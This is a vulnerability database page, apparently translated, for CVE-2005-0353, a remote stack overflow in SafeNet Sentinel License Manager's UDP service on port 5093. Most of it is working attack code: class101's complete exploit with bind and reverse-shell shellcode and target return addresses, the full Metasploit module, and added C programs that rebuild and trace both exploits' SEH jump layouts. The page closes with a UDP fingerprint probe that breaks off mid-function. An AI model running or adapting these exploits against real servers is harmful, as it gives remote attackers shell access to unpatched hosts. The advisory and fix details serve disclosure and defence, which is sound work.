CVE-2005-0353
CVSS 10.0
Published: 2005-05-02 00:00:00
Revised: 2016-10-17 23:11:00

[Original] Buffer overflow in the Sentinel LM (Lservnt) service in the Sentinel License Manager 7.2.0.2 allows remote attackers to execute arbitrary code by sending a large amount of data to UDP port 5093.


[CNNVD] Sentinel License Manager Lservnt Service Remote Buffer Overflow Vulnerability (CNNVD-200505-490)

        Sentinel License Manager is software for managing software licences remotely.
        Its Lservnt service contains a classic stack buffer overflow in request handling: a remote attacker can send an overlong request, overflow the buffer, and execute arbitrary instructions on the server.
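
The fault class described above, shown as an added illustration written for this page (it is not SafeNet's code and not a reconstruction of lservnt): a UDP request handler that copies a datagram into a fixed stack buffer with no length check, beside the bounded version. The frame model, the 1035-byte buffer size (borrowed from the chunk size the class101 exploit notes further down report) and the marker values are assumptions made for the demo.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Local request buffer size.  Assumption for this model only: it reuses the
 * 1035-byte chunk size that the class101 exploit notes on this page report
 * for lservnt; the real frame layout of the service is not known here. */
#define REQ_BUF 1035

/* Toy model of the handler's stack frame on x86: the request buffer, then
 * the saved frame pointer and return address that sit above it. */
struct frame {
    unsigned char req[REQ_BUF];
    uint32_t saved_ebp;
    uint32_t saved_eip;
};

/* Vulnerable pattern: the datagram length is never compared with the buffer
 * size, so a long datagram runs over the saved registers.  The copy is
 * clamped to sizeof(*f) purely to keep the demo within defined behaviour;
 * the real bug has no clamp at all.  Returns the number of bytes copied. */
size_t handle_request_vuln(struct frame *f, const unsigned char *dgram, size_t len)
{
    f->saved_ebp = 0xBBBBBBBBu;           /* markers so the overwrite is visible */
    f->saved_eip = 0xCCCCCCCCu;
    size_t n = len > sizeof(*f) ? sizeof(*f) : len;
    memcpy((unsigned char *)f, dgram, n); /* unbounded "copy into f->req" */
    return n;
}

/* Hardened form: refuse anything that does not fit the buffer and copy at
 * most sizeof(f->req) bytes.  Returns 0 on success, -1 when dropped. */
int handle_request_safe(struct frame *f, const unsigned char *dgram, size_t len)
{
    f->saved_ebp = 0xBBBBBBBBu;
    f->saved_eip = 0xCCCCCCCCu;
    if (len > sizeof(f->req))
        return -1;                        /* oversize request: drop it and log it */
    memcpy(f->req, dgram, len);
    return 0;
}

/* Constructed datagram: `len` filler bytes with 0xDEADBEEF placed where the
 * saved return address lies.  Runs it through the vulnerable handler and
 * returns what saved_eip holds afterwards. */
uint32_t eip_after_vuln(size_t len)
{
    unsigned char dgram[4096];
    struct frame f;
    size_t off = offsetof(struct frame, saved_eip);
    uint32_t fake = 0xDEADBEEFu;          /* host byte order: the model runs in-process */
    if (len > sizeof(dgram)) len = sizeof(dgram);
    memset(dgram, 'A', sizeof(dgram));
    if (off + sizeof(fake) <= len)
        memcpy(dgram + off, &fake, sizeof(fake));
    handle_request_vuln(&f, dgram, len);
    return f.saved_eip;
}

/* The same datagram through the hardened handler; returns its result code. */
int safe_result(size_t len)
{
    unsigned char dgram[4096];
    struct frame f;
    if (len > sizeof(dgram)) len = sizeof(dgram);
    memset(dgram, 'A', sizeof(dgram));
    return handle_request_safe(&f, dgram, len);
}

int main(void)
{
    printf("saved_eip after a 1000-byte request: 0x%08x\n", (unsigned)eip_after_vuln(1000));
    printf("saved_eip after a 1100-byte request: 0x%08x\n", (unsigned)eip_after_vuln(1100));
    printf("hardened handler, 1000 bytes: %d   1100 bytes: %d\n", safe_result(1000), safe_result(1100));
    return 0;
}
```

The first line prints 0xcccccccc and the second 0xdeadbeef: in this model a 1100-byte datagram puts attacker bytes from offset 1040 into the return address, while the hardened handler drops the same datagram with -1. The two exploits below drive exactly this mechanic, only further out, because the service keeps repeating the first 1035 bytes of the request until the stack is overwritten at around byte 3940 (see class101's notes).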
        

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Access complexity: [--]
Access vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0353
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0353
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-490
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=111022094326772&w=2
(UNKNOWN)  BUGTRAQ  20050307 CIRT.DK Advisory - SafeNet Inc Sentinel License Manager 7.2.0.2 Buffer Overflow
http://marc.info/?l=full-disclosure&m=111072872816405&w=2
(UNKNOWN)  FULLDISC  20050313 [HAT-SQUAD] SafeNet Sentinel LM, UDP License Manager Exploit
http://www.cirt.dk/advisories/cirt-30-advisory.pdf
(VENDOR_ADVISORY)  MISC  http://www.cirt.dk/advisories/cirt-30-advisory.pdf
http://www.kb.cert.org/vuls/id/108790
(VENDOR_ADVISORY)  CERT-VN  VU#108790
http://www.securityfocus.com/bid/12742
(UNKNOWN)  BID  12742
http://xforce.iss.net/xforce/xfdb/19621
(UNKNOWN)  XF  sentinel-license-manager-bo(19621)

- Vulnerability information

Sentinel License Manager Lservnt Service Remote Buffer Overflow Vulnerability
Critical    Buffer overflow
Published: 2005-05-02 00:00:00    Updated: 2005-10-20 00:00:00
Remote

- Advisory and patch

        The vendor has fixed this issue in version 8.0 and later of the software; download it from the vendor's homepage:
        http://www.safenet-inc.com/products/sentinel/Sentinel_RMS.asp

- Vulnerability information (875)

Sentinel LM 7.x UDP License Service Remote Buffer Overflow Exploit (EDBID:875)
Platform/type: windows remote
Date: 2005-03-13 (Verified)
Port: 5093    Author: class101
/*
SentinelLM, UDP License Service Stack Overflow

Homepage:         safenet-inc.com
Affected version: 7.*
Patched  version: 8.0
Link:             safenet-inc.com/products/sentinel/lm.asp
Date:             09 March 2005
Advisory:         securitytracker.com/alerts/2005/Mar/1013385.html

Application Risk: High
Internet Risk:    Medium (UDP)

Discovery Credits: Dennis Rand (CIRT.DK)
Exploit Credits  : class101

Hole History:

                  07-3-2005: BOF flaw published by Dennis Rand of CIRT.DK
                  09-3-2005: hat-squad's exploit done
                  13-3-2005: hat-squad's exploit released

Notes:

    -the exploit targets 5093/UDP
    -no bad chars detected
    -Unlike what is said in the CIRT.DK advisory, you shouldn't submit 3000 bytes of data; the overflow is actually occurring at around
     3900 bytes. SentinelLM will process the first 1035 bytes of your buffer and will repeat those until the override of the stack.
     Conclusion: you have to be good with maths (nor to control our friend olly & calc :>) to overwrite the right place in your buffer[1035]
     to finally reach eip when your buffer "autogrows" at around buffer[3940].
    -sending the buffer twice because the 1st attempt can fail sometimes.
    -using a nice popopret outside of a loaded module for SP2 and 2k3 targets.
     this offset has been tested on SP2 and 2003 ENGLISH (maybe language-dependent, dunno..)
    -note that target3 (SP2/2k3) can sometimes work as target2 (SP1a/1/0) but it is not stable; this is why I use
     one of the two I have posted at full-disclosure (0x71ABE325/SP1a/1/0). This last one is stable for the 3 SPs (ENGLISH!).
	
Compilation:

                  101_SentLM.cpp ......... Win32 (MSVC,cygwin)
                  101_SentLM.c ........... Linux (FreeBSD,etc..)


	*Another fine working code, published as a patch warning or for an EXPERIMENTAL use!* 


Greet:

	         *GUILLERMITO* "the terrorist...sigh..:("


		              NIMA MAJIDI
		              BEHRANG FOULADI
		              PEJMAN
		              HAMID
		              HAT-SQUAD.COM
		              metasploit.com
		              A^C^E of addict3d.org
		              str0ke of milw0rm.com
		              and my homy CLASS101.ORG :>

*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>   /* atoi() on both platforms */
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

char scode1[]=
"\x33\xC9\x83\xE9"
"\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";


char scode2[]=
/*original vlad902's reverse shellcode from metasploit.com
  NOT xored, modded by class101 for ca's xpl0it to remove the common badchar "\x20"
  original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
"\xFC\x6A\xEB\x52" /*modded adjusting jump*/
"\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x3C\x8B\x7C\x05"
"\x78\x01\xEF"
"\x83\xC7\x01" /*modded, adding 1 to edi*/
"\x8B\x4F\x17" /*modded, adjusting ecx*/
"\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
"\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0"
"\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
"\x8B\x5F\x23" /*modded, adjusting ebx*/
"\x01\xEB\x66\x8B\x0C\x4B"
"\x8B\x5F\x1B" /*modded, adjusting ebx*/
"\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40"
"\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E"
"\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32"
"\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66"
"\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF"
"\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x00\x00\x00\x00"
"\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF"
"\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50"
"\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD"
"\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3"
"\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51"
"\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37"
"\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF"
"\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";

char payload[1100];
char sip[4];char spo[2];   /* raw bytes of the reverse-shell IP and port, checked below for 0x00 */

char pad[]="\xEB\x08\x90\x90";
char pad2[]="\xE9\xC2\xFC\xFF\xFF";
char ebx2k[]="\x08\xB0\x01\x78";
char ebxp[]="\x25\xE3\xAB\x71";  /*popopret inside of a loaded module for SP0-1-1a*/
char ebxsp2k3[]="\xE1\x1B\xFA\x7F"; /*popopret outside of a loaded module for SP2 and 2003*/
/*some tests*/
char fix[]="\x76\x6C\x6D\x73";
char fix2[]="\x72\x76\x72\x2E";

#ifdef WIN32
	WSADATA wsadata;
#endif

void ver();
void usage(char* us);

int main(int argc,char *argv[])
{
	ver();
	int co, sw=0, check1, check2;
	unsigned int gip;        /* 4 bytes on every supported platform (unsigned long is 8 on 64-bit Linux) */
	unsigned short gport;
	char *target=NULL, *os=NULL;
	if (argc>6||argc<3||atoi(argv[1])>4||atoi(argv[1])<1){usage(argv[0]);return -1;}
	if (argc==5){usage(argv[0]);return -1;}
    if (strlen(argv[2])<7){usage(argv[0]);return -1;}
    if (argc==6)
	{
        if (strlen(argv[4])<7){usage(argv[0]);return -1;}
	}
#ifndef WIN32
	if (argc==6)
	{
		gip=inet_addr(argv[4]);
		gport=htons(atoi(argv[5]));
		memcpy(sip, &gip, 4);memcpy(spo, &gport, 2);
		/* the reverse shellcode is not null-safe: refuse an IP or port that encodes to a 0x00 byte */
		if (memchr(sip, 0, 4)){printf("[+] error, the IP has a null byte in hex...\n");return -1;}
		if (memchr(spo, 0, 2)){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
	}
#define Sleep		sleep
#define SOCKET		int
#define closesocket(s) close(s)
#else
	if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
	if (argc==6)
	{
		gip=inet_addr(argv[4]);
		gport=htons(atoi(argv[5]));
		memcpy(sip, &gip, 4);memcpy(spo, &gport, 2);
		/* the reverse shellcode is not null-safe: refuse an IP or port that encodes to a 0x00 byte */
		if (memchr(sip, 0, 4)){printf("[+] error, the IP has a null byte in hex...\n");return -1;}
		if (memchr(spo, 0, 2)){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
	}
#endif
	int port;
	if (argc==4||argc==6){port=atoi(argv[3]);} else port=5093;
	SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
	s=socket(AF_INET,SOCK_DGRAM,0);
	if (s==-1){printf("[+] socket() error\n");return -1;}	
	if (atoi(argv[1]) == 1){target=ebx2k;os="Win2k SP4 Server English\n[+]            Win2k SP4 Pro    English";}
	if (atoi(argv[1]) == 2){target=ebxp;os="WinXP SP0  Pro    English\n[+]            WinXP SP1  Pro    English\n[+]            WinXP SP1a Pro    English";}
	if (atoi(argv[1]) == 3){target=ebxsp2k3;os="WinXP SP2  Pro    English";}
	if (atoi(argv[1]) == 4){target=ebxsp2k3;os="Win2003 SP0 Server English";}
	server.sin_family=AF_INET;
	server.sin_addr.s_addr=inet_addr(argv[2]);   /* inet_addr() already returns network byte order */
	server.sin_port=htons(port);
	memset(payload,0x90,1100);
	if (atoi(argv[1]) == 4)
	{
		memcpy(payload+836,target,4);
		memcpy(payload+832,pad,4);
		memcpy(payload+845,pad2,5);
	}
	else
	{	
		memcpy(payload+840,target,4);
		memcpy(payload+836,pad,4);
		memcpy(payload+849,pad2,5);
	}
	memcpy(payload+12,fix,4);
	memcpy(payload+16,fix2,4);
	if (argc==6)
	{
		memcpy(&scode2[167], &gip, 4);   /* patch the reverse IP into the "push imm32" at scode2[166] */
		memcpy(&scode2[173], &gport, 2); /* patch the reverse port into the "push imm16" at scode2[171] */
		memcpy(payload+33,scode2,sizeof(scode2)-1);
	}
	else memcpy(payload+33,scode1,sizeof(scode1)-1);
	printf("[+] target(s): %s\n",os);
	printf("[+] sending datas to the udp port...\n");
	co = sendto(s,payload,sizeof(payload),0,(struct sockaddr *)&server,sizeof(server));
#ifdef WIN32
			Sleep(1000);
#else
			Sleep(1);
#endif
	co = sendto(s,payload,sizeof(payload),0,(struct sockaddr *)&server,sizeof(server));
#ifdef WIN32
			Sleep(1000);
#else
			Sleep(1);
#endif
	timeout.tv_sec=10;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
	sw = select((s+1),&mask,NULL,NULL,&timeout);
	if(sw)
	{
		printf("[+] sending error, the server prolly rebooted.\n");
		closesocket(s);
		return -1;
	}
	else
	{
		printf("[+] size of payload: %d\n",(int)sizeof(payload));   /* payload is not NUL-terminated, so sizeof, not strlen */
		if (argc==6){printf("[+] payload sent, look at your listener, you should get a shell\n");}
		else printf("[+] payload sent, use telnet victimIP:101 to get a shell\n");
		closesocket(s);
		return 0;
	}
	return 0;
}


void usage(char* us) 
{  
  printf("                                                                                \n");
	printf("      [+]  . 101_SentLM.exe Target VulnIP (bind mode)                           \n");
	printf("      [+]  . 101_SentLM.exe Target VulnIP VulnPORT (bind mode)                  \n");
	printf("      [+]  . 101_SentLM.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode) \n");
	printf("TARGETS:                                                                        \n");
	printf("      [+] 1. Win2k  SP4  Server English (*) - v5.0.2195                         \n");
	printf("      [+] 1. Win2k  SP4  Pro    English (*) - v5.0.2195                         \n");
	printf("      [+] 2. WinXP  SP0  Pro.   English (*) - v5.1.2600                         \n");
	printf("      [+] 2. WinXP  SP1  Pro.   English (*) - v5.1.2600                         \n");
	printf("      [+] 2. WinXP  SP1a Pro.   English (*) - v5.1.2600                         \n");
	printf("      [+] 3. WinXP  SP2  Pro.   English (*) - v5.1.2600.2180                    \n");
	printf("      [+] 4. Win2k3 SP0  Server English (*) - v5.2.3790                         \n");
	printf("NOTE:                                                                           \n");
	printf("      The exploit binds a cmdshell on port 101 or                            \n");
	printf("      reverses a cmdshell to your listener.                                  \n");
	printf("      A wildcard (*) means tested working, else, supposed working.           \n");
	printf("      A symbol   (-) means all.                                              \n");
	printf("      Compilation msvc6, cygwin, Linux.                                         \n");
	printf("                                                                                \n");
	return;
} 
void ver()
{	
	printf("                                                                     \n");
	printf("        ===================================================[v0.1]====\n");
	printf("        =====================SafeNet Sentinel LM=====================\n"); 
	printf("        ===============Remote Buffer Overflow Exploit================\n");
	printf("        ======coded by class101=============[Hat-Squad.com]==========\n");
	printf("        =====================================[class101.org]==========\n");
	printf("                                                                     \n");
}

// milw0rm.com [2005-03-13]
		

- Vulnerability information (16746)

SentinelLM UDP Buffer Overflow (EDBID:16746)
Platform/type: windows remote
Date: 2010-05-09 (Verified)
Port: 5093    Author: metasploit
##
# $Id: sentinel_lm7_udp.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SentinelLM UDP Buffer Overflow',
			'Description'    => %q{
				This module exploits a simple stack buffer overflow in the Sentinel
				License Manager. The SentinelLM service is installed with a
				wide selection of products and seems particularly popular with
				academic products. If the wrong target value is selected,
				the service will crash and not restart.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2005-0353'],
					[ 'OSVDB', '14605'],
					[ 'BID', '12742'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['SentinelLM 7.2.0.0 Windows NT 4.0 SP4/SP5/SP6', { 'Ret' => 0x77681799 }], # ws2help.dll
					['SentinelLM 7.2.0.0 Windows 2000 English',       { 'Ret' => 0x75022ac4 }], # ws2help.dll
					['SentinelLM 7.2.0.0 Windows 2000 German',        { 'Ret' => 0x74fa1887 }], # ws2help.dll
					['SentinelLM 7.2.0.0 Windows XP English SP0/SP1', { 'Ret' => 0x71aa32ad }], # ws2help.dll
					['SentinelLM 7.2.0.0 Windows 2003 English SP0',   { 'Ret' => 0x7ffc0638 }], # peb
				],
			'DisclosureDate' => 'Mar 07 2005' ))

		register_options(
			[
				Opt::RPORT(5093)
			], self.class)
	end

	def check
		connect_udp
		udp_sock.put("\x7a\x00\x00\x00\x00\x00")
		res = udp_sock.recvfrom(8192)
		disconnect_udp

		# recvfrom returns [data, host, port]; a live lservnt echoes the 0x7a opcode as the first reply byte
		if (res and res[0] and res[0][0,1] == "\x7a")
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect_udp

		# Payload goes first
		buf = payload.encoded + rand_text_english(2048-payload.encoded.length)

		# Return to a pop/pop/ret via SEH
		buf[836, 4] = [target.ret].pack('V')

		# The pop/pop/ret takes us here, jump back 5 bytes
		buf[832, 2] = "\xeb\xf9"

		# Now jump all the way back to our shellcode
		buf[827, 5] = "\xe9" + [-829].pack('V')

		udp_sock.put(buf)
		udp_sock.recvfrom(8192)

		handler
		disconnect_udp
	end


end
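
The control-flow path both exploits on this page rely on, as an added example written for this page (it is not Metasploit's or class101's code): build the two buffer layouts from the offsets and jump bytes given above and in the class101 source, then walk them the way the CPU does after the overwritten handler's pop/pop/ret pops execution into the nSEH slot. The 'A' filler standing in for rand_text_english, the 0xCC bytes standing in for the shellcode, and the helper names are assumptions; the addresses 0x71aa32ad and 0x71abe325 are the ones the two exploits use.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN 2048                 /* the Metasploit module sends 2048 bytes */

static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

static int32_t get_le32(const unsigned char *p)
{
    uint32_t u = (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
    int32_t s;
    memcpy(&s, &u, sizeof s);         /* reinterpret as the signed rel32 of a near jmp */
    return s;
}

/* Metasploit layout: payload at 0, handler pointer at 836, "jmp short -7" in
 * the nSEH slot at 832, "jmp near -829" at 827.  'A' stands in for
 * rand_text_english.  Returns the buffer length, 0 if the payload is too big. */
size_t build_msf_layout(unsigned char *buf, const unsigned char *payload, size_t plen, uint32_t ret)
{
    if (plen > 800) return 0;            /* 'Space' => 800 */
    memset(buf, 'A', BUF_LEN);
    memcpy(buf, payload, plen);
    put_le32(buf + 836, ret);            /* SEH handler -> pop/pop/ret gadget */
    buf[832] = 0xEB; buf[833] = 0xF9;    /* nSEH: jmp short -7 -> 827 */
    buf[827] = 0xE9; put_le32(buf + 828, (uint32_t)-829);
    return BUF_LEN;
}

/* class101 layout: 1100-byte 0x90 sled, shellcode at 33, nSEH at `base`
 * (836, or 832 for the Win2003 target) = EB 08 90 90, handler at base+4,
 * "jmp near -830" (E9 C2 FC FF FF) at base+13. */
size_t build_class101_layout(unsigned char *buf, const unsigned char *sc, size_t sclen, uint32_t ret, size_t base)
{
    if (33 + sclen > base || base + 19 > 1100) return 0;
    memset(buf, 0x90, 1100);
    memcpy(buf + 33, sc, sclen);
    buf[base] = 0xEB; buf[base + 1] = 0x08; buf[base + 2] = 0x90; buf[base + 3] = 0x90;
    put_le32(buf + base + 4, ret);
    buf[base + 13] = 0xE9; put_le32(buf + base + 14, (uint32_t)-830);
    return 1100;
}

/* Walk from the nSEH slot as the CPU does after pop/pop/ret: decode EB rel8
 * and E9 rel32, step over 0x90, stop at the first other byte.  Returns the
 * landing offset, or -1 if the chain leaves the buffer or never settles. */
long follow_jumps(const unsigned char *buf, size_t len, size_t start)
{
    long ip = (long)start;
    for (int hops = 0; hops < 64; hops++) {
        if (ip < 0 || (size_t)ip >= len) return -1;
        unsigned char op = buf[ip];
        if (op == 0xEB && (size_t)ip + 2 <= len) {
            int rel8 = buf[ip + 1] < 128 ? buf[ip + 1] : buf[ip + 1] - 256;
            ip = ip + 2 + rel8;
        } else if (op == 0xE9 && (size_t)ip + 5 <= len) {
            ip = ip + 5 + get_le32(buf + ip + 1);
        } else if (op == 0x90) {
            ip += 1;
        } else {
            return ip;
        }
    }
    return -1;
}

/* Where each layout lands, using 0xCC (int3) bytes as a stand-in shellcode. */
long msf_landing(void)
{
    unsigned char buf[BUF_LEN], sc[8];
    memset(sc, 0xCC, sizeof sc);
    if (!build_msf_layout(buf, sc, sizeof sc, 0x71aa32adu)) return -1;
    return follow_jumps(buf, BUF_LEN, 832);
}

long class101_landing(size_t base)
{
    unsigned char buf[BUF_LEN], sc[8];
    memset(sc, 0xCC, sizeof sc);
    if (!build_class101_layout(buf, sc, sizeof sc, 0x71abe325u, base)) return -1;
    return follow_jumps(buf, 1100, base);
}

int main(void)
{
    printf("Metasploit layout: nSEH at 832 -> lands at offset %ld\n", msf_landing());
    printf("class101 layout (XP/2000): nSEH at 836 -> lands at offset %ld\n", class101_landing(836));
    printf("class101 layout (2003):    nSEH at 832 -> lands at offset %ld\n", class101_landing(832));
    return 0;
}
```

Walking the bytes as written, class101's chain hops forward over the handler address, through three NOPs, back 830 bytes into the sled and settles at offset 33, the first shellcode byte, for both the 836 and the 832 variant; the Metasploit chain goes 832 -> 827 -> offset 3 of the buffer as sent, three bytes into payload.encoded. Whoever reuses either layout with a different stub should recompute the near-jump displacement from the page's offsets rather than copy the constant.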
		

- Vulnerability information (F83234)

SentinelLM UDP Buffer Overflow (PacketStormID:F83234)
Date: 2009-11-26 00:00:00
Author: H D Moore  metasploit.com
Tags: exploit, overflow
CVE-2005-0353

This Metasploit module exploits a simple stack overflow in the Sentinel License Manager. The SentinelLM service is installed with a wide selection of products and seems particularly popular with academic products. If the wrong target value is selected, the service will crash and not restart.
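
The fingerprint the module's check method performs, as an added stand-alone tool written for this page (not Metasploit's code): send the same six-byte probe to UDP/5093 and accept a reply only if its first byte echoes 0x7a. Since the module warns that the wrong target crashes lservnt without restarting, a non-corrupting probe like this is what an inventory scan should use; the 3-second timeout, the 512-byte receive buffer, the helper names and POSIX sockets are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
#include <netdb.h>

#define LM_PORT "5093"

/* The six-byte probe the module's check sends: 0x7a followed by five zero
 * bytes.  The page does not document the field meanings; this is the raw
 * datagram as sent.  Fills `out` and returns the probe length. */
size_t build_probe(unsigned char out[6])
{
    static const unsigned char probe[6] = { 0x7a, 0x00, 0x00, 0x00, 0x00, 0x00 };
    memcpy(out, probe, sizeof probe);
    return sizeof probe;
}

/* A live lservnt answers with a datagram whose first byte echoes 0x7a;
 * anything else (or silence) is treated as "not this service". */
int looks_like_sentinel(const unsigned char *resp, size_t n)
{
    return n >= 1 && resp[0] == 0x7a;
}

/* Send the probe to host:port over UDP and wait up to timeout_s seconds.
 * Returns 1 for a matching reply, 0 for no or non-matching reply, -1 on a
 * resolver or socket error. */
int probe_host(const char *host, const char *port, int timeout_s)
{
    struct addrinfo hints, *ai;
    unsigned char probe[6], resp[512];
    int fd, result = -1;

    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_DGRAM;
    if (getaddrinfo(host, port, &hints, &ai) != 0) return -1;

    fd = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
    if (fd >= 0) {
        size_t plen = build_probe(probe);
        if (sendto(fd, probe, plen, 0, ai->ai_addr, ai->ai_addrlen) == (ssize_t)plen) {
            fd_set rd;
            struct timeval tv = { timeout_s, 0 };
            FD_ZERO(&rd);
            FD_SET(fd, &rd);
            result = 0;                                 /* sent; silence until proven otherwise */
            if (select(fd + 1, &rd, NULL, NULL, &tv) > 0) {
                ssize_t n = recv(fd, resp, sizeof resp, 0);
                if (n > 0) result = looks_like_sentinel(resp, (size_t)n);
            }
        }
        close(fd);
    }
    freeaddrinfo(ai);
    return result;
}

int main(int argc, char **argv)
{
    const char *port = argc > 2 ? argv[2] : LM_PORT;
    int r;
    if (argc < 2) { fprintf(stderr, "usage: %s host [port]\n", argv[0]); return 2; }
    r = probe_host(argv[1], port, 3);
    if (r == 1)      printf("%s: SentinelLM license service answered on UDP/%s\n", argv[1], port);
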